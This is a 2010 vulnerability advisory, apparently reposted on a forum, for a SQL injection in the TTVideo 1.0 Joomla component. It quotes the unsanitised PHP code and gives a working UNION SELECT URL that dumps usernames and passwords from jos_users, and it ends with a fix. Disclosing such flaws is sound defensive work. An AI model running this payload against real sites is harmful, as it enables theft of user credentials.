كود PHP:
TTVideo 1.0 Joomla Component SQL Injection Vulnerability
Download link: http://www.toughtomato.com/resources/downloads/joomla-1.5/components/ttvideo/
Name TTVideo Vendor http://www.toughtomato.com Versions Affected 1.0
Author Salvatore Fresta aka Drosophila Website http://www.salvatorefresta.net Contact salvatorefresta [at] gmail [dot] com Date 2010-07-27
X. INDEX
I. ABOUT THE APPLICATION II. DESCRIPTION III. ANALYSIS IV. SAMPLE CODE V. FIX
I. ABOUT THE APPLICATION________________________
TTVideo is a Joomla! component that makes use of thepopular video sharing site Vimeo to create a videolibrary.
II. DESCRIPTION_______________
A parameter in ttvideo.php is not properly sanitisedbefore being used in a SQL query.
III. ANALYSIS_____________
Summary:
A) SQL Injection
A) SQL Injection________________
The parameter cid passed to ttvideo.php when task is setto video is not properly sanitised before being used ina SQL query. This can be exploited to manipulate SQLqueries by injecting arbitrary SQL code. The followingis the vulnerable code:
ttvideoController.php (line 40):
function video() { $cid = JRequest::getVar('cid', null, 'default');
ttvideo.php (line 188):
function getVideo($id) { $db = $this->getDBO(); $db->setQuery("SELECT * from #__ttvideo WHERE id=$id"); $video = $db->loadObject(); if ($video === null) JError::raiseError(500, 'Video with ID: '.$id.' not found.'); return $video;}IV. SAMPLE CODE_______________
A) SQL Injection
http://site/path/index.php?option=com_ttvideo&task=video&cid=-1 UNION SELECT 1,2,3,4,5,6,7,8,CONCAT(username,0x3A,password),10,11,12,13,14,15,16,17 FROM jos_users
V. FIX______
Use JRequest::getInt instead of JRequest::getVar